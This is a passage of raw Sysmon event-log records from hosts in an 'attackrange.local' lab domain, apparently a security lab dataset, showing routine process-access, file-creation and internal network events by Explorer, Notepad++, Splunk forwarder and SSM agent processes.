Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104207Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:21.498{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104206Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:21.091{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BF7FAB87F8BE59103ECBF9A19C1E514,SHA256=E74E9E545F65F68324633B32015BA59D06EE24267A15BCA9E6A45DBAD8CF0E94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082029Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:22.592{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66EB973DDE65549171E6DA872BFFEFE6,SHA256=6460F4D245988D3F4BA47769D34B553DA900405928E93DF717FD4D4938A3C736,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104210Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:22.107{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C932309F42B28E4C49FE7E5C43CD8E9A,SHA256=7EEC50EC543718B9659EC81B32FDA1F41FE1EC84D37FE9FC42B4214A5D140578,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082031Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:23.639{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E45CB986E756761B21F43BA2B65DD1B,SHA256=12DCE87AED31B4ED42E9136A70709678FF8CD7A4BEE76358E60910152947B52A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104211Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:23.123{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4809A01CF6B87A97E4EE66B506B524E8,SHA256=63871A1EE7405C253BA5B3A21E21040D0A1FCD51F00A1D8D65FC22C80F5E518A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082030Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:20.692{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50071-false10.0.1.12-8000- 23542300x800000000000000082032Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:24.733{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9222F85E1EA0212CAC16171A00EBADFE,SHA256=774E3A2D2BB7E712C0237C08D0D36F3E187525C49E3D87E2FC208F69B9E0E042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104212Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:24.123{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=903C8493D3097405D2BF8606B1469FC7,SHA256=B96B5AC448AAC3083B8AE532E6B1C472E2B6F5669D1BC0272BF363701BD917C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082033Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:25.733{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=315118F378F2F83E41AE7C45AE309C4A,SHA256=A9F9591035B33991B24CCDF1564DB08A38A05D9DD44D875E64FE5445854942D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104217Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:25.841{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104216Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:25.841{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104215Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:25.841{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104214Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:25.638{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\new 2@2021-10-04_075343MD5=8858F310E0CDA215F3D3774E6D94BDC6,SHA256=861775CF9693963BFB78944B924ADE38F450B85AD788116C61879E0B83DDC144,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104213Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:25.123{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E89DE7D96C9571B58BD27B4EBFA17E81,SHA256=14C6D20EDF12F48A5BE923527191D09E9F182FE5577116E66FDF13126C14988F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082034Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:26.889{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7596FE43EE471B8FFF674EF2E972CF7B,SHA256=0D3BADDC7EEF61F31B07610B8AF23A339F255EA575D8514974A6C2B6AEA3CEFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104220Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:26.860{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-026MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104219Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:25.299{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49582-false10.0.1.12-8000- 23542300x8000000000000000104218Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:26.154{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30A801FAFDA79B095D60093AFD3BC971,SHA256=6C2D37BA5009F444727C8D2894F12FF17F0CC8B98A537D5C98DF459EE45C98B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082035Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:27.936{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0F799A4D0C217FFA41BBCBF5A8DEDE0,SHA256=0562A849FC2DA17592B601A6529AC5CF9BAA0DC45092E3E102C76D2A60FD421E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104222Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:27.874{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-027MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104221Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:27.169{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AFADBB953EBEDE4BC9D9C1B7E160E71,SHA256=0E1BB78C94A0FFCAF8B93A5BB98A8A47C7B0213C6DE52E501E82B5ACE20D394E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082037Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:28.967{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=009F281E6E70DB9FC51717BB96D9132D,SHA256=141F4B9AD4230B771BDDD099C8A0968F5A632EEDC46890A10F3ED283F67BC342,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104223Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:28.215{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E39F037B044BE37B33CC787C21C6484,SHA256=0C9F21B45BA3B84E514A31A98FD9F9AFBA6C221ACF7DB0EF1B938893A506CE80,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082036Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:26.614{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50072-false10.0.1.12-8000- 23542300x800000000000000082039Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:29.967{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9D88A0E9C6475F3D02DF3D42F742B06,SHA256=7D59AC789C16624385D02F54A60999B205AB8A0326C888CB57F777EE48D31A70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104224Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:29.235{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B2106E227F78A027EB14CBA4D4ECA8A,SHA256=585F66D2835AC5113895AAEBB4E1CE4E16231C6E45073BEF9F8CDB0741E40F56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082038Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:29.701{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082041Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:28.384{2FDD8D40-AC7D-615A-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.15win-host-36.attackrange.local138netbios-dgm 354300x800000000000000082040Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:28.383{2FDD8D40-AC7D-615A-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-36.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 23542300x8000000000000000104225Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:30.251{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEEDD1AA091B5DA2840347D695728846,SHA256=9FBDE35219163A228CEA3705EABA94D75668982D5C54D0DFD29B81A80AAEFB16,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082056Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:29.239{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50073-false10.0.1.12-8089- 10341000x800000000000000082055Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.373{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B337-615A-5E01-00000000FD01}2476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082054Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.373{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082053Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.373{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082052Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.373{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082051Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.373{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082050Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.373{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082049Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.373{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082048Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.373{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082047Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 